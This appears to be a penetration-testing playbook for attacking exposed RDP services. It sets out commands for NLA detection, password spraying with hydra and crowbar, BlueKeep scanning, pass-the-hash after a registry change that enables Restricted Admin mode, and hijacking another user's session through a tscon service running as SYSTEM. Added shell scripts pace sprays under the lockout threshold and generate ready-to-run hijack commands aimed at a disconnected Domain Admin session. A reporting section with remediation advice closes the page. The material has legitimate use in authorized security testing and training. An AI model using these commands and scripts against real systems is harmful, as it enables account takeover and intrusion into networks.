Methodology Checklist
- Detect RDP and NLA status: nmap -Pn -p 3389 --script rdp-enum-encryption [TARGET]
- Brute-force / spray: hydra -L users.txt -P pass.txt rdp://[TARGET] (throttle with -t 4, see cheatsheet)
- BlueKeep (CVE-2019-0708): nmap -p 3389 --script rdp-vuln-bluekeep [TARGET] (third-party NSE script, not bundled with nmap) or Metasploit auxiliary/scanner/rdp/cve_2019_0708_bluekeep. Note that the bundled rdp-vuln-ms12-020 script checks MS12-020 (CVE-2012-0002), an older pre-auth RDP bug, and does not detect BlueKeep.
- DejaBlue check (CVE-2019-1181/1182)
- Session hijacking (requires SYSTEM): tscon [SESSION_ID] /dest:[OUR_SESSION_NAME]
- Pass-the-Hash to RDP (Restricted Admin mode): xfreerdp /v:[TARGET] /u:[USER] /pth:[HASH]
- Check for RDP shadowing (an admin can view or control another user's session)
Operational Context
Use when: RDP (port 3389) is exposed: brute or spray credentials, check for BlueKeep/DejaBlue, test NLA bypass, or spray harvested creds.
Think Dumber First: Run nmap -Pn -p 3389 --script rdp-enum-encryption [TARGET] for NLA status. NLA enabled = valid credentials are required before any exploit. No NLA = BlueKeep-class pre-auth attacks are viable if the host is unpatched. Spray valid AD creds with nxc rdp before manual brute force.
Skip when: NLA is enabled and you have no creds: brute force is slow and loud; prioritize getting creds from another vector.
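The triage rule above (NLA status decides whether a pre-auth path exists) is easy to misread from raw nmap output. The following is an added example, not code from the original page: a small POSIX shell script that parses the "Security layer" block of rdp-enum-encryption output and prints the decision. The two nmap outputs inside it are constructed samples in the shape the NSE script prints. It assumes that a server enforcing NLA refuses the "Native RDP" (standard RDP security) protocol, so that line is either absent or carries a failure reason instead of SUCCESS; "Native RDP: SUCCESS" therefore means NLA is not required.

```shell
#!/bin/sh
# Added example (not from the original page): turn an nmap rdp-enum-encryption
# result into the "think dumber first" decision.
# Assumption: a host that enforces NLA refuses the "Native RDP" protocol, so
# the script either omits that line or prints a failure reason in place of
# SUCCESS. "Native RDP: SUCCESS" means legacy security is still accepted.
set -eu

# Constructed sample: host that still accepts legacy (non-NLA) security.
SAMPLE_NO_NLA='PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server'

# Constructed sample: host that enforces NLA (failure-code line shape assumed).
SAMPLE_NLA='PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: HYBRID_REQUIRED_BY_SERVER
|     RDSTLS: SUCCESS
|     SSL: HYBRID_REQUIRED_BY_SERVER
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server'

# has_line <fixed-string> <text>: true when the text contains the string
has_line() { printf '%s\n' "$2" | grep -Fq -- "$1"; }

# nla_status <nmap-output>: prints enforced | optional | unknown
nla_status() {
  if ! has_line 'CredSSP (NLA): SUCCESS' "$1"; then
    echo unknown      # script did not run, or 3389 is not really RDP
  elif has_line 'Native RDP: SUCCESS' "$1"; then
    echo optional
  else
    echo enforced
  fi
}

# weak_crypto <nmap-output>: true when 40- or 56-bit RC4 is still negotiated
weak_crypto() {
  printf '%s\n' "$1" | grep -Eq '(40|56)-bit RC4: SUCCESS'
}

# next_step <nmap-output>: the page's decision rule as one line of advice
next_step() {
  case "$(nla_status "$1")" in
    optional) echo 'NLA not required: pre-auth checks (BlueKeep scanner) are viable, then spray' ;;
    enforced) echo 'NLA enforced: no pre-auth path, spray harvested AD creds with nxc rdp first' ;;
    *)        echo 'no rdp-enum-encryption output: rerun nmap -Pn -p 3389 --script rdp-enum-encryption' ;;
  esac
}

for s in "$SAMPLE_NO_NLA" "$SAMPLE_NLA"; do
  next_step "$s"
  if weak_crypto "$s"; then
    echo '  also: 40/56-bit RC4 accepted, note the weak RDP encryption level in the report'
  fi
done
```

To use it on a live host, replace the sample variables with the captured output of the nmap command (for example `out=$(nmap -Pn -p 3389 --script rdp-enum-encryption "$target")` and then `next_step "$out"`). The RC4 check is a bonus finding that often rides along with a missing NLA setting.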
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nmap -Pn -p3389 [TARGET_IP] | Confirm RDP is open |
| nmap -p3389 --script rdp-vuln-bluekeep [TARGET_IP] | Check for BlueKeep (CVE-2019-0708); third-party NSE script, copy it into nmap's scripts directory first |
| crowbar -b rdp -s [TARGET_IP]/32 -U [USER_LIST] -c '[PASS]' | RDP password spray (Crowbar, most reliable) |
| hydra -L [USER_LIST] -p '[PASS]' [TARGET_IP] rdp -t 4 | RDP password spray (Hydra, keep threads at -t 4) |
| rdesktop -u [USER] -p [PASS] [TARGET_IP] | Connect via rdesktop |
| xfreerdp /v:[TARGET_IP] /u:[USER] /p:[PASS] | Connect via xfreerdp |
| xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP Pass-the-Hash (requires Restricted Admin mode on the target) |
| reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable Restricted Admin mode for PtH (value 0 = enabled; needs local admin on the target) |
| query user | List all sessions on the target (our own row is marked with >) |
| sc.exe create sessionhijack binpath= "cmd.exe /k tscon [SESSION_ID] /dest:[OUR_SESSION_NAME]" | Create the hijack service (victim's numeric ID, our session NAME) |
| net start sessionhijack | Start the service: tscon runs as SYSTEM and the victim's desktop replaces ours |
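The spray rows in the cheatsheet leave pacing to the operator, and an unpaced spray is what locks out a domain. The following is an added example, not code from the original page: a POSIX shell script that reads the lockout threshold and counter-reset window from `nxc smb [DC] -u [USER] -p [PASS] --pass-pol` output, keeps a two-attempt safety margin, and emits one crowbar invocation per candidate password with a sleep inserted whenever the next batch would cross the threshold. The policy text and password list inside it are constructed samples; the label/value line shape is an assumption about nxc's output, and `[TARGET_IP]` / `users.txt` are the page's placeholders.

```shell
#!/bin/sh
# Added example (not from the original page): pace an RDP password spray
# against the domain lockout policy so it never trips the threshold.
# Assumptions: the policy text is in the label/value shape nxc smb --pass-pol
# prints ("None" when lockout is disabled); crowbar is run once per password
# with -c (single password) and -U (user list), as in the cheatsheet.
set -eu

TARGET='[TARGET_IP]'   # page placeholder
USERS='users.txt'      # page placeholder

# Constructed sample of nxc smb --pass-pol output (not real data).
SAMPLE_POLICY='SMB   10.0.0.5   445   DC01   [+] Dumping password info for domain: CORP
SMB   10.0.0.5   445   DC01   Minimum password length: 8
SMB   10.0.0.5   445   DC01   Password history length: 24
SMB   10.0.0.5   445   DC01   Reset Account Lockout Counter: 30 minutes
SMB   10.0.0.5   445   DC01   Locked Account Duration: 30 minutes
SMB   10.0.0.5   445   DC01   Account Lockout Threshold: 5
SMB   10.0.0.5   445   DC01   Forced Log off Time: Not Set'

# Constructed spray list, one candidate per line.
PASSWORDS='Winter2024!
Password123!
Welcome1
Company2024
Summer2024!
P@ssw0rd
Changeme1'

# lockout_threshold <policy>: failed logons that lock an account; 0 = disabled
lockout_threshold() {
  t=$(printf '%s\n' "$1" | grep 'Account Lockout Threshold:' | awk '{print $NF}')
  case "$t" in ''|None) echo 0 ;; *) echo "$t" ;; esac
}

# reset_window_min <policy>: minutes until the bad-password counter resets
reset_window_min() {
  w=$(printf '%s\n' "$1" | grep 'Reset Account Lockout Counter:' | awk '{print $(NF-1)}')
  echo "${w:-0}"
}

# attempts_per_window <threshold>: keep two attempts in reserve; 0 = no limit
attempts_per_window() {
  if [ "$1" -eq 0 ]; then echo 0
  elif [ "$1" -le 2 ]; then echo 1
  else echo $(( $1 - 2 ))
  fi
}

# rounds_needed <npasswords> <per_window>: how many reset windows the list spans
rounds_needed() {
  if [ "$2" -eq 0 ]; then echo 1; else echo $(( ($1 + $2 - 1) / $2 )); fi
}

# plan_spray <policy> <password-list>: print the paced crowbar schedule.
# Pipe the output into sh to execute it; by itself it is a dry run.
plan_spray() {
  thr=$(lockout_threshold "$1")
  win=$(reset_window_min "$1")
  per=$(attempts_per_window "$thr")
  n=0
  printf '%s\n' "$2" | while IFS= read -r pw; do
    [ -n "$pw" ] || continue
    if [ "$per" -gt 0 ] && [ "$n" -gt 0 ] && [ $(( n % per )) -eq 0 ]; then
      # the counter must reset before the next batch; add one minute of slack
      echo "sleep $(( (win + 1) * 60 ))"
    fi
    printf "crowbar -b rdp -s %s/32 -U %s -c '%s'\n" "$TARGET" "$USERS" "$pw"
    n=$(( n + 1 ))
  done
}

plan_spray "$SAMPLE_POLICY" "$PASSWORDS"
```

With a threshold of 5 the script allows three attempts per account per 30-minute window, so seven passwords take three rounds with two 31-minute sleeps in between. Passwords containing a single quote need extra quoting before the generated lines are executed; when the threshold is "None" the script emits no sleeps at all, which is still worth throttling by hand for noise reasons.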
Deep Dive & Workflow
Password Spraying: Prefer Crowbar Over Hydra for RDP
RDP servers are sensitive to connection concurrency: too many parallel handshakes and the listener starts refusing connections, which shows up as errors and false negatives in the spray. Crowbar is purpose-built for RDP and handles this more gracefully. Hydra works but needs -t 4 (max 4 parallel tasks) and -W (seconds to wait after each attempt):
crowbar -b rdp -s [TARGET_IP]/32 -U users.txt -c 'Password123!'
hydra -L users.txt -p 'Password123!' [TARGET_IP] rdp -t 4 -W 3
Either way, read the domain lockout threshold first (nxc smb [DC] -u [USER] -p [PASS] --pass-pol) and keep attempts per account below it.
RDP Session Hijacking
If you have Local Administrator privileges on a machine where other users have sessions (Active or Disconnected), you can take over those sessions, including Domain Admin sessions, without knowing their password.
# Step 1: See the sessions on the host
query user
# Output shows USERNAME, SESSIONNAME (e.g., rdp-tcp#5), ID (e.g., 2), STATE (Active/Disc). Our own row is marked with >. Disconnected sessions have no SESSIONNAME.
# Step 2: Create a Windows service that runs tscon as SYSTEM. The first argument is the VICTIM's numeric ID; /dest: is OUR session NAME.
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
# Step 3: Start the service. SYSTEM runs tscon and your screen becomes the victim's desktop.
net start sessionhijack
# net start typically reports that the service did not respond (cmd.exe is not a real service); by then the hijack has already happened.
# Clean up afterwards: sc.exe delete sessionhijack
tscon is a built-in Windows tool that transfers sessions. The trick is that SYSTEM can move sessions freely, but normal admins cannot (tscon run as an admin prompts for the victim's password), so wrapping it in a service elevates it automatically.
Limitation: reported not to work on Windows Server 2019; verify on the target build.
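The two numbers in the tscon line are easy to swap (victim's numeric ID first, our session NAME after /dest:), and a disconnected victim row has no session name, which shifts the columns. The following is an added example, not code from the original page: a POSIX shell script that takes a pasted `query user` listing, finds our own session (the row marked with >), lists every other session with its ID and state, and prints the exact sc.exe / net start lines from the page plus a cleanup step, refusing to build the command if the target is our own session or does not exist. The listing inside it is a constructed sample; the column layout (USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME, with an empty SESSIONNAME for Disc rows) is an assumption about the standard output.

```shell
#!/bin/sh
# Added example (not from the original page): plan the tscon hijack from a
# pasted "query user" listing before touching the host.
# Assumption: standard columns USERNAME SESSIONNAME ID STATE IDLE TIME LOGON
# TIME; a disconnected session has an empty SESSIONNAME, so ID and STATE are
# read from the right-hand side of each row (LOGON TIME is three tokens).
set -eu

SVC='sessionhijack'   # service name used on the page

# Constructed sample of "query user" output on the target (not real data).
SAMPLE_QUERY=' USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>pentester            rdp-tcp#13          3  Active          .  1/14/2024 9:02 AM
 da.admin                                 2  Disc         1:05  1/14/2024 8:10 AM
 j.smith               rdp-tcp#7          4  Active         14  1/14/2024 8:55 AM
 svc_backup            console            1  Active       none  1/13/2024 6:00 PM'

# sessions <listing>: normalised rows "mine|user|sessionname|id|state"
sessions() {
  printf '%s\n' "$1" | awk '
    $1 == "USERNAME" { next }
    {
      mine = (substr($1, 1, 1) == ">")
      user = mine ? substr($1, 2) : $1
      name = (NF >= 8) ? $2 : "-"       # Disc rows carry no session name
      printf "%s|%s|%s|%s|%s\n", mine, user, name, $(NF-5), $(NF-4)
    }'
}

# own_session <listing>: the session NAME we are attached to (for /dest:)
own_session() {
  sessions "$1" | awk -F'|' '$1 == "1" { print $3 }'
}

# candidates <listing>: "id user state" for every session that is not ours
candidates() {
  sessions "$1" | awk -F'|' '$1 == "0" { print $4, $2, $5 }'
}

# hijack_cmds <listing> <victim-id>: the service-based tscon sequence
hijack_cmds() {
  dest=$(own_session "$1")
  if [ -z "$dest" ] || [ "$dest" = "-" ]; then
    echo 'error: our own session has no name (not an interactive RDP session)' >&2
    return 1
  fi
  if ! candidates "$1" | awk -v id="$2" '$1 == id { found = 1 } END { exit !found }'; then
    echo "error: session $2 is not another user's session" >&2
    return 1
  fi
  printf 'sc.exe create %s binpath= "cmd.exe /k tscon %s /dest:%s"\n' "$SVC" "$2" "$dest"
  printf 'net start %s\n' "$SVC"
  printf 'sc.exe delete %s\n' "$SVC"   # remove the service once the session is ours
}

echo "our session: $(own_session "$SAMPLE_QUERY")"
echo "candidates (id user state):"
candidates "$SAMPLE_QUERY"
hijack_cmds "$SAMPLE_QUERY" 2
```

The Disc row for da.admin (ID 2) is the interesting one: a disconnected Domain Admin session is still logged on and becomes ours with the printed commands. The generated lines are typed on the Windows host; the planner only keeps the IDs straight.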
RDP Pass-the-Hash
Requires Restricted Admin mode on the target (disabled by default). The error "Account restrictions prevent sign-in" (full text: "Account restrictions are preventing this user from signing in") = Restricted Admin mode is off.
Enable it (requires local admin / registry write access on the target; value 0 = enabled):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Then connect with the NT hash:
xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH]
Caveat: in Restricted Admin mode the user's credentials are never sent to the host, so outbound network access from that session runs as the machine account, not as the user.
BlueKeep (CVE-2019-0708)
Pre-auth RCE via a use-after-free in the RDP kernel driver termdd.sys (MS_T120 channel), giving code execution as SYSTEM. Affects Windows XP / Server 2003 through Windows 7 / Server 2008 R2; Windows 8 and later are not affected. MSF module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce. Known to cause BSOD: consult the client before running it in production. Detect safely with the non-crashing check:
nmap -p3389 --script rdp-vuln-bluekeep [TARGET_IP]
or auxiliary/scanner/rdp/cve_2019_0708_bluekeep in Metasploit.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Hydra RDP brute fails | Wrong module or rate limited | Use crowbar -b rdp -s [TARGET]/32 -u [USER] -C pass.txt; or nxc rdp [TARGET] -u users.txt -p pass.txt |
| RDP connection drops immediately | Account locked or NLA rejecting | Check the lockout policy with nxc smb [DC] -u [USER] -p [PASS] --pass-pol; an authentication attempt against a locked account returns STATUS_ACCOUNT_LOCKED_OUT |
| xfreerdp connection fails | SSL/certificate error | Add /cert:ignore: xfreerdp /v:[TARGET] /u:[USER] /p:[PASS] /cert:ignore |
| BlueKeep scanner shows vulnerable but exploit fails | Kernel memory layout differs per OS build and hypervisor | The MSF module needs the right target set (OS build plus VMware/VirtualBox/Hyper-V variants) and may need GROOMBASE/GROOMSIZE tuning; a wrong choice BSODs the host |
| RDP session drops after 60 seconds | Idle or disconnect session-limit GPO on the server | No client flag overrides a server-side limit; keep the session active, or with admin rights inspect MaxIdleTime / MaxDisconnectionTime under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services |
Reporting Trigger
Finding Title: RDP Exposed Without Network-Level Authentication
Impact: RDP without NLA allows pre-authentication attacks (BlueKeep-class) and enables credential brute force without account lockout visibility, providing interactive desktop access when credentials are compromised.
Root Cause: RDP enabled on internet-facing or poorly segmented hosts without NLA enforcement. No account lockout threshold or failed-authentication alerting.
Recommendation: Enable Network Level Authentication (NLA) on all RDP endpoints. Restrict RDP access to a management VPN or jump host. Implement account lockout and alert on failed RDP authentication. Apply current Windows security patches.